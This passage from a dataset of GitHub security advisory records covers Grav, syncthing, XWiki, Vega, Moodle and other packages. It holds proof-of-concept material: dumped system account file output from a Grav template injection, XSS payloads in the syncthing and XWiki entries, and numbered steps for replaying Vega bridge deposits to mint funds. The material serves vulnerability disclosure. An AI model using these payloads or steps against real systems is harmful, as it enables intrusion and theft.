Service:/var/empty:/usr/bin/false _coremediaiod:*:236:236:Core Media IO Daemon:/var/empty:/usr/bin/false _launchservicesd:*:239:239:_launchservicesd:/var/empty:/usr/bin/false _iconservices:*:240:240:IconServices:/var/empty:/usr/bin/false _distnote:*:241:241:DistNote:/var/empty:/usr/bin/false _nsurlsessiond:*:242:242:NSURLSession Daemon:/var/db/nsurlsessiond:/usr/bin/false _displaypolicyd:*:244:244:Display Policy Daemon:/var/empty:/usr/bin/false _astris:*:245:245:Astris Services:/var/db/astris:/usr/bin/false _krbfast:*:246:-2:Kerberos FAST Account:/var/empty:/usr/bin/false _gamecontrollerd:*:247:247:Game Controller Daemon:/var/empty:/usr/bin/false _mbsetupuser:*:248:248:Setup User:/var/setup:/bin/bash _ondemand:*:249:249:On Demand Resource Daemon:/var/db/ondemand:/usr/bin/false _xserverdocs:*:251:251:macOS Server Documents Service:/var/empty:/usr/bin/false _wwwproxy:*:252:252:WWW Proxy:/var/empty:/usr/bin/false _mobileasset:*:253:253:MobileAsset User:/var/ma:/usr/bin/false _findmydevice:*:254:254:Find My Device Daemon:/var/db/findmydevice:/usr/bin/false _datadetectors:*:257:257:DataDetectors:/var/db/datadetectors:/usr/bin/false _captiveagent:*:258:258:captiveagent:/var/empty:/usr/bin/false _ctkd:*:259:259:ctkd Account:/var/empty:/usr/bin/false _applepay:*:260:260:applepay Account:/var/db/applepay:/usr/bin/false _hidd:*:261:261:HID Service User:/var/db/hidd:/usr/bin/false _cmiodalassistants:*:262:262:CoreMedia IO Assistants User:/var/db/cmiodalassistants:/usr/bin/false _analyticsd:*:263:263:Analytics Daemon:/var/db/analyticsd:/usr/bin/false _fpsd:*:265:265:FPS Daemon:/var/db/fpsd:/usr/bin/false _timed:*:266:266:Time Sync Daemon:/var/db/timed:/usr/bin/false _nearbyd:*:268:268:Proximity and Ranging Daemon:/var/db/nearbyd:/usr/bin/false _reportmemoryexception:*:269:269:ReportMemoryException:/var/db/reportmemoryexception:/usr/bin/false _driverkit:*:270:270:DriverKit:/var/empty:/usr/bin/false _diskimagesiod:*:271:271:DiskImages IO Daemon:/var/db/diskimagesiod:/usr/bin/false _logd:*:272:272:Log Daemon:/var/db/diagnostics:/usr/bin/false _appinstalld:*:273:273:App Install Daemon:/var/db/appinstalld:/usr/bin/false _installcoordinationd:*:274:274:Install Coordination Daemon:/var/db/installcoordinationd:/usr/bin/false _demod:*:275:275:Demo Daemon:/var/empty:/usr/bin/false _rmd:*:277:277:Remote Management Daemon:/var/db/rmd:/usr/bin/false _accessoryupdater:*:278:278:Accessory Update Daemon:/var/db/accessoryupdater:/usr/bin/false _knowledgegraphd:*:279:279:Knowledge Graph Daemon:/var/db/knowledgegraphd:/usr/bin/false _coreml:*:280:280:CoreML Services:/var/db/coreml:/usr/bin/false _sntpd:*:281:281:SNTP Server Daemon:/var/empty:/usr/bin/false _trustd:*:282:282:trustd:/var/empty:/usr/bin/false _mmaintenanced:*:283:283:mmaintenanced:/var/db/mmaintenanced:/usr/bin/false _darwindaemon:*:284:284:Darwin Daemon:/var/db/darwindaemon:/usr/bin/false _notification_proxy:*:285:285:Notification Proxy:/var/empty:/usr/bin/false _avphidbridge:*:288:288:Apple Virtual Platform HID Bridge:/var/empty:/usr/bin/false _biome:*:289:289:Biome:/var/db/biome:/usr/bin/false _backgroundassets:*:291:291:Background Assets Service:/var/empty:/usr/bin/false _oahd:*:441:441:OAH Daemon:/var/empty:/usr/bin/false _oahd:*:441:441:OAH Daemon:/var/empty:/usr/bin/false ``` #### PoC Video - [PoC Video](https://drive.google.com/file/d/1wsmv7abdGc8WdYLNPPC5GrFcybhCORf2/view?usp=sharing) ### Impact Remote Command Execution (RCE) is possible. ### Occurrences - https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174 ### References - [PortSwigger: Server-side template injection](https://portswigger.net/web-security/server-side-template-injection) - [HackTricks: SSTI (Server Side Template Injection)](https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#twig-php) ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'getgrav/grav'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.42'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34251'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5'}, {'type': 'PACKAGE', 'url': 'https://github.com/getgrav/grav'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/blob/develop/system/src/Grav/Common/Twig/Extension/GravExtension.php#L174'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-16T19:35:56Z', 'nvd_published_at': None}" 1.4.0,GHSA-g3jr-6vj4-3x82,2023-06-09T22:18:39Z,2023-06-04T12:30:18Z,,['CVE-2023-3095'],TeamPass vulnerable to Improper Access Control,Improper Access Control in GitHub repository nilsteampassnet/teampass prior to 3.0.9.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'nilsteampassnet/teampass'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-3095'}, {'type': 'WEB', 'url': 'https://github.com/nilsteampassnet/teampass/commit/774985f62f080715774604927fba2cb6ef701612'}, {'type': 'PACKAGE', 'url': 'https://github.com/nilsteampassnet/teampass'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/35c899a9-40a0-4e17-bfb5-2a1430bc83c4'}]","{'cwe_ids': ['CWE-284'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T02:06:40Z', 'nvd_published_at': None}" 1.4.0,GHSA-9rp6-23gf-4c3h,2023-06-06T18:50:28Z,2023-06-06T16:39:57Z,,['CVE-2022-46165'],syncthing vulnerable to Cross-site Scripting (XSS) in Web GUI,"## Impact 1. A compromised instance with shared folders could sync malicious files which contain arbitrary HTML and JavaScript in the name. If the owner of another device looks over the shared folder settings and moves the mouse over the latest sync, a script could be executed to change settings for shared folders or add devices automatically. 2. Adding a new device with a malicious name could embed HTML or JavaScript inside parts of the page. ## Risk As long as trusted devices are used, the risk is low. Additionally, the web GUI is not used that often in daily use which reduces the likelihood of exploitation. ## Details ### 1. Field ""Latest Change"" * Open the web GUI at [http://127.0.0.1:8384/](http://127.0.0.1:8384/). * Create/Delete a file named `````` and sync it to the other instance. * Move your mouse over the latest change to trigger the tooltip. ##### Web browser source ```html @ 2022-11-30 16:58:43"" aria-describedby=""tooltip409527""> "" ng-if=""!folderStats[folder.id].lastFile.deleted"" class=""ng-scope"">Updated ""><img src=a onerror=alert(123)>
\""> @ 2022-11-30 16:58:43
``` ##### Corresponding code in the project File ````gui/default/index.html````: ```html  Latest Change Updated {%file%} Deleted {%file%} ``` File ````gui/default/syncthing/core/tooltipDirective.js````: ```javascript angular.module('syncthing.core') .directive('tooltip', function () { return { restrict: 'A', link: function (scope, element, attributes) { $(element).tooltip({ html: 'true' }); } }; }); ``` The attribute ```html``` should not be set to ```true``` or input sanitized. ### 2. Field ""Shared With"" * Open the web GUI at [http://127.0.0.1:8384/](http://127.0.0.1:8384/). * Create a device with the following name ```fedora 1""'>

Headline

```. * Add the device to another instance and share a folder. * Move your mouse over the malicious device name to trigger the tooltip. ##### Web browser source ```html

Headline

"" ng-bind-html=""sharesFolder(folder)"" class=""ng-binding"" aria-describedby=""tooltip348410"">fedora 1""'>

Headline

fedora 1""'>

Headline

``` ##### Corresponding code in the project File ````gui/default/index.html````: ```html  Shared With (1' + ('The remote device has not accepted sharing this folder.' | translate) + ')' : ''}} {{folderHasPausedDevices(folder) ? '
(2' + ('The remote device has paused this folder.' | translate) + ')' : ''}}"" ng-bind-html=""sharesFolder(folder)"">
``` File ````gui/default/syncthing/core/tooltipDirective.js````: ```javascript angular.module('syncthing.core') .directive('tooltip', function () { return { restrict: 'A', link: function (scope, element, attributes) { $(element).tooltip({ html: 'true' }); } }; }); ``` The attribute ```html``` should not be set to ```true``` or input sanitized. ##### HTML Injection in ""Edit Folder"" ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/syncthing/syncthing'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.23.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/syncthing/syncthing/security/advisories/GHSA-9rp6-23gf-4c3h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-46165'}, {'type': 'WEB', 'url': 'https://github.com/syncthing/syncthing/commit/73c52eafb6566435dffd979c3c49562b6d5a4238'}, {'type': 'WEB', 'url': 'https://github.com/syncthing/syncthing/commit/f5e5af391a6583047c64ef8c51642003a79b75cf'}, {'type': 'PACKAGE', 'url': 'https://github.com/syncthing/syncthing'}, {'type': 'WEB', 'url': 'https://github.com/syncthing/syncthing/releases/tag/v1.23.5'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IRYGBFJPVBW6PPTETNIBWQJE4HJSA5PJ/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XEBWSQVGHSTR4ZO7LVVEMPEGMV2DS5XR/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T16:39:57Z', 'nvd_published_at': None}" 1.4.0,GHSA-xxp4-mf4h-6cwm,2023-06-30T20:21:55Z,2023-06-22T21:30:49Z,,['CVE-2023-35133'],Moodle vulnerable to Server Side Request Forgery,"An issue in the logic used to check 0.0.0.0 against the cURL blocked hosts lists resulted in an SSRF risk. This flaw affects Moodle versions 4.2, 4.1 to 4.1.3, 4.0 to 4.0.8, 3.11 to 3.11.14, 3.9 to 3.9.21 and earlier unsupported versions.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2.0'}, {'fixed': '4.2.1'}]}], 'versions': ['4.2.0']}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.9'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0'}, {'fixed': '3.11.15'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.22'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35133'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7A72KX4WU6GK2CX4TKYFGFASPKOEOJFC/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I5QAEAGJ44NVXLAJFJXKARKC45OGEDXT/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=447831'}, {'type': 'WEB', 'url': 'http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-78215'}]","{'cwe_ids': ['CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-23T21:38:44Z', 'nvd_published_at': None}" 1.4.0,GHSA-7px2-3c2p-q4v4,2023-06-30T20:38:36Z,2023-06-30T06:30:14Z,,['CVE-2023-26135'],flatnest Prototype Pollution vulnerability,All versions of the package flatnest are vulnerable to Prototype Pollution via the `nest()` function in `flatnest/nest.js` file.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'flatnest'}, 'ecosystem_specific': {'affected_functions': ['flatnest.nest']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26135'}, {'type': 'WEB', 'url': 'https://github.com/brycebaril/node-flatnest/issues/4'}, {'type': 'PACKAGE', 'url': 'https://github.com/brycebaril/node-flatnest'}, {'type': 'WEB', 'url': 'https://github.com/brycebaril/node-flatnest/blob/b7d97ec64a04632378db87fcf3577bd51ac3ee39/nest.js#L43'}, {'type': 'WEB', 'url': 'https://github.com/brycebaril/node-flatnest/blob/b7d97ec64a04632378db87fcf3577bd51ac3ee39/nest.js%23L43'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-FLATNEST-3185149'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:38:36Z', 'nvd_published_at': None}" 1.4.0,GHSA-7q8c-49f4-4c8q,2023-06-27T19:50:27Z,2023-06-19T03:30:18Z,,['CVE-2023-35839'],Solon vulnerable to deserialization of untrusted data,Solon before 2.3.3 allows Deserialization of Untrusted Data.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.noear:solon'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35839'}, {'type': 'WEB', 'url': 'https://github.com/noear/solon/issues/145'}, {'type': 'PACKAGE', 'url': 'https://github.com/noear/solon'}, {'type': 'WEB', 'url': 'https://github.com/noear/solon/compare/v2.3.2...v2.3.3'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T16:09:20Z', 'nvd_published_at': None}" 1.4.0,GHSA-r8xc-xxh3-q5x3,2023-06-30T20:27:58Z,2023-06-22T19:59:55Z,,['CVE-2023-35160'],XWiki Platform vulnerable to reflected cross-site scripting via back and xcontinue parameters in resubmit template,"### Impact Users are able to forge an URL with a payload allowing to inject Javascript in the page (XSS). It's possible to exploit the resubmit template to perform a XSS, e.g. by using URL such as: > xwiki/bin/view/XWiki/Main?xpage=resubmit&resubmit=javascript:alert(document.domain)&xback=javascript:alert(document.domain) This vulnerability exists since XWiki 2.5-milestone-2. ### Patches The vulnerability has been patched in XWiki 14.10.5 and 15.1-rc-1. ### Workarounds It's possible to workaround the vulnerability by editing the template resubmit.vm to perform checks on it, but note that the appropriate fix involves new APIs that have been recently introduced in XWiki. See the referenced jira tickets. ### References * Jira ticket about the vulnerability: https://jira.xwiki.org/browse/XWIKI-20343 * Introduction of the macro used for fixing all those vulnerabilities: https://jira.xwiki.org/browse/XWIKI-20583 * Commit containing the actual fix in the page: https://github.com/xwiki/xwiki-platform/commit/dbc92dcdace33823ffd1e1591617006cb5fc6a7f ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org) ### Attribution This vulnerability has been reported by René de Sain @renniepak.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web-templates'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5-milestone-2'}, {'fixed': '14.10.5'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web-templates'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0-rc-1'}, {'fixed': '15.1-rc-1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-r8xc-xxh3-q5x3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35160'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/dbc92dcdace33823ffd1e1591617006cb5fc6a7f'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20343'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20583'}]","{'cwe_ids': ['CWE-79', 'CWE-87'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-22T19:59:55Z', 'nvd_published_at': None}" 1.4.0,GHSA-x32c-59v5-h7fg,2023-06-14T21:14:49Z,2023-06-14T15:30:39Z,,['CVE-2023-34540'],Langchain OS Command Injection vulnerability,Langchain 0.0.171 is vulnerable to Arbitrary Code Execution via command injection in the `jira.run()` command,[],"[{'package': {'ecosystem': 'PyPI', 'name': 'langchain'}, 'ecosystem_specific': {'affected_functions': ['langchain.utilities.jira.JiraAPIWrapper.run']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.0.225'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34540'}, {'type': 'WEB', 'url': 'https://github.com/hwchase17/langchain/issues/4833'}, {'type': 'WEB', 'url': 'https://github.com/langchain-ai/langchain/issues/4833'}, {'type': 'WEB', 'url': 'https://github.com/langchain-ai/langchain/pull/6992'}, {'type': 'WEB', 'url': 'https://github.com/langchain-ai/langchain/commit/a2f191a32229256dd41deadf97786fe41ce04cbb'}, {'type': 'PACKAGE', 'url': 'https://github.com/hwchase17/langchain'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/langchain/PYSEC-2023-91.yaml'}]","{'cwe_ids': ['CWE-78'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T21:02:46Z', 'nvd_published_at': None}" 1.4.0,GHSA-5fp6-4xw3-xqq3,2023-06-23T13:56:28Z,2023-06-12T18:37:31Z,,[],@keystone-6/core's bundled cuid package known to be insecure,"### Summary The `cuid` package used by `@keystone-6/*` and upstream dependencies is deprecated and [marked as insecure by the author](https://github.com/paralleldrive/cuid#status-deprecated-due-to-security-use-cuid2-instead). As reported by the author > Cuid and other k-sortable and non-cryptographic ids (Ulid, ObjectId, KSUID, all UUIDs) are all insecure. Use @paralleldrive/cuid2 instead. ### What are doing about this? - [We are waiting on Prisma](https://github.com/keystonejs/keystone/issues/8282) to add support for [`cuid2`](https://github.com/paralleldrive/cuid2) - Alternatively, we might default to a random string ourselves ### What can I do about this? We have added a work-around for users who want to provide custom identifiers in https://github.com/keystonejs/keystone/pull/8645 ### What if I need a `cuid`? The features marked as a security vulnerability by @paralleldrive are sometimes actually needed ([as written in the README of `cuid`](https://github.com/paralleldrive/cuid#motivation)) - the problem is the inherent risks that features like this can have. You might actually want the features of a monotonically increasing (auto-increment, k-sortable), and timestamp-based id as part of your application, and keystone should support that - but you might not want them by _default_. This is why this security advisory has been accepted by me (@dcousens), we currently use cuid identifiers by default, and that should change. ### Impact I have accepted this security advisory on the basis that we don't need this kind of identifier typically, and the need for them should be driven by an application's requirements, not a convenient default. ",[],"[{'package': {'ecosystem': 'npm', 'name': '@keystone-6/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.3.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/keystonejs/keystone/security/advisories/GHSA-5fp6-4xw3-xqq3'}, {'type': 'WEB', 'url': 'https://github.com/keystonejs/keystone/issues/8282#issuecomment-1586019823'}, {'type': 'PACKAGE', 'url': 'https://github.com/keystonejs/keystone'}, {'type': 'WEB', 'url': 'https://github.com/paralleldrive/cuid#status-deprecated-due-to-security-use-cuid2-instead'}]","{'cwe_ids': [], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-06-12T18:37:31Z', 'nvd_published_at': None}" 1.4.0,GHSA-rm8v-mxj3-5rmq,2023-06-14T17:24:36Z,2023-06-14T17:24:36Z,,[],github.com/lestrrat-go/jwx vulnerable to Potential Padding Oracle Attack,"### Summary Decrypting AES-CBC encrypted JWE has Potential Padding Oracle Attack Vulnerability. ### Details On [v2.0.10](https://github.com/lestrrat-go/jwx/releases/tag/v2.0.10), decrypting AES-CBC encrypted JWE may return an error ""failed to generate plaintext from decrypted blocks: invalid padding"": https://github.com/lestrrat-go/jwx/blob/8840ffd4afc5839f591ff0e9ba9034af52b1643e/jwe/internal/aescbc/aescbc.go#L210-L213 Reporting padding error causes [Padding Oracle Attack](https://en.wikipedia.org/wiki/Padding_oracle_attack) Vulnerability. RFC 7516 JSON Web Encryption (JWE) says that we **MUST NOT** do this. > 11.5. Timing Attacks > To mitigate the attacks described in RFC 3218 [RFC3218], the > recipient MUST NOT distinguish between format, padding, and length > errors of encrypted keys. It is strongly recommended, in the event > of receiving an improperly formatted key, that the recipient > substitute a randomly generated CEK and proceed to the next step, to > mitigate timing attacks. In addition, the time to remove padding depends on the length of the padding. It may leak the length of the padding by Timing Attacks. https://github.com/lestrrat-go/jwx/blob/796b2a9101cf7e7cb66455e4d97f3c158ee10904/jwe/internal/aescbc/aescbc.go#L33-L66 To mitigate Timing Attacks, it MUST be done in constant time. ### Impact The authentication tag is verified, so it is not an immediate attack. ",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/lestrrat-go/jwx/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.0.10'}}, {'package': {'ecosystem': 'Go', 'name': 'github.com/lestrrat-go/jwx'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.2.25'}}]","[{'type': 'WEB', 'url': 'https://github.com/lestrrat-go/jwx/security/advisories/GHSA-rm8v-mxj3-5rmq'}, {'type': 'WEB', 'url': 'https://github.com/lestrrat-go/jwx/commit/6c41e3822485fc7e11dd70b4b0524b075d66b103'}, {'type': 'WEB', 'url': 'https://github.com/lestrrat-go/jwx/commit/d9ddbc8e5009cfdd8c28413390b67afa7f576dd6'}, {'type': 'PACKAGE', 'url': 'https://github.com/lestrrat-go/jwx'}, {'type': 'WEB', 'url': 'https://github.com/lestrrat-go/jwx/blob/796b2a9101cf7e7cb66455e4d97f3c158ee10904/jwe/internal/aescbc/aescbc.go#L33-L66'}, {'type': 'WEB', 'url': 'https://github.com/lestrrat-go/jwx/blob/8840ffd4afc5839f591ff0e9ba9034af52b1643e/jwe/internal/aescbc/aescbc.go#L210-L213'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-14T17:24:36Z', 'nvd_published_at': None}" 1.4.0,GHSA-6w63-h3fj-q4vw,2023-06-06T17:33:13Z,2023-06-06T17:33:13Z,,['CVE-2023-34104'],fast-xml-parser vulnerable to Regex Injection via Doctype Entities,"### Impact ""fast-xml-parser"" allows special characters in entity names, which are not escaped or sanitized. Since the entity name is used for creating a regex for searching and replacing entities in the XML body, an attacker can abuse it for DoS attacks. By crafting an entity name that results in an intentionally bad performing regex and utilizing it in the entity replacement step of the parser, this can cause the parser to stall for an indefinite amount of time. ### Patches The problem has been resolved in v4.2.4 ### Workarounds Avoid using DOCTYPE parsing by `processEntities: false` option. ### References _Are there any links users can visit to find out more?_ ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'fast-xml-parser'}, 'ecosystem_specific': {'affected_functions': ['fast-xml-parser.XMLParser']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/NaturalIntelligence/fast-xml-parser/security/advisories/GHSA-6w63-h3fj-q4vw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34104'}, {'type': 'WEB', 'url': 'https://github.com/NaturalIntelligence/fast-xml-parser/commit/39b0e050bb909e8499478657f84a3076e39ce76c'}, {'type': 'PACKAGE', 'url': 'https://github.com/NaturalIntelligence/fast-xml-parser'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T17:33:13Z', 'nvd_published_at': None}" 1.4.0,GHSA-8rc9-vxjh-qjf2,2023-06-26T16:32:12Z,2023-06-20T16:36:18Z,,['CVE-2023-35163'],Vega's validators able to submit duplicate transactions ,"A vulnerability exists that allows a malicious validator to trick the Vega network into re-processing past Ethereum events from Vega’s Ethereum bridge. For example, a deposit to the collateral bridge for 100USDT that credits a party’s general account on Vega, can be re-processed 50 times resulting in 5000USDT in that party’s general account. This is without depositing any more than the original 100USDT on the bridge. Despite this exploit requiring access to a validator's Vega key, a validator key can be obtained at the small cost of 3000VEGA, the amount needed to announce a new node onto the network. The steps to carry out this exploit are as follows: 1. Cause an Ethereum event on one of the bridge contracts e.g a deposit to the collateral bridge, or the staking bridge 2. This will result in the Ethereum-event-forwarder of each node to submit a ChainEvent transaction to the Vega network corresponding to that event 3. Scrape the valid chain event transaction from the Tendermint block data using a node’s Tendermint API 4. Change the value of the `txId` field of the ChainEvent to any valid, but different, value 5. Bundle the tweaked ChainEvent into a new transaction, sign it with a validator key and resubmit to the Vega network 6. The fraudulent ChainEvent will be processed by Vega as if it were a new ChainEvent even though it did not occur on Ethereum The key to this exploit is in step 4. The `txId` field of the ChainEvent is used when checking for ChainEvent resubmission, but NOT during the subsequent on-chain verification of the event. Therefore changing the `txId` of an existing ChainEvent is enough to by-pass the duplication check and for it to still be verified as a real event. ### Impact The impact of this exploit is dependent on the ChainEvent being manipulated. The below table describes each one: | Chain Event | Allows | Consequence | | ------------- | ------------- | ------------- | | Deposit | Generation of unlimited funds of any asset | Withdrawal of all assets | | Stake Deposit | Delegate unlimited Vega to a single node | A single node has controlling amount of voting power | | Stake Removed | Force a Validator node to drop below self-stake requirements | Prevents reward payouts | | Bridge Stop | The Vega network to think the bridge is stopped | Prevent anyone from withdrawing funds | | Signer Removed | The Vega network to think a validator nodes is not on the multisig contract | Prevent reward payouts | ### Patches v0.71.6 ### Workarounds No work around known, however there are mitigations in place should this vulnerability be exploited: - there are monitoring alerts, for `mainnet1`, in place to identify any issues of this nature including this vulnerability being exploited - the validators have the ability to stop the bridge thus stopping any withdrawals should this vulnerability be exploited ### References N/A ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:P/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'code.vegaprotocol.io/vega'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.71.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vegaprotocol/vega/security/advisories/GHSA-8rc9-vxjh-qjf2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35163'}, {'type': 'WEB', 'url': 'https://github.com/vegaprotocol/vega/commit/56b09bf57af8cd9eca5996252d86f469a3e34c68'}, {'type': 'PACKAGE', 'url': 'https://github.com/vegaprotocol/vega'}, {'type': 'WEB', 'url': 'https://github.com/vegaprotocol/vega/releases/tag/v0.71.6'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T16:36:18Z', 'nvd_published_at': None}" 1.4.0,GHSA-vpxf-q44g-w34w,2023-07-03T18:38:23Z,2023-06-30T20:36:55Z,,['CVE-2023-36815'],Sealos billing system permission control defect,"### Summary There is a permission flaw in the Sealos billing system, which allows users to control the recharge resource account. sealos. io/v1/Payment, resulting in the ability to recharge any amount of 1 RMB. ### Details The reason is that sealos is in arrears. Egg pain, we can't create a terminal anymore. Let's charge for it: Then it was discovered that the charging interface had returned all resource information. Unfortunately, based on previous vulnerability experience, the 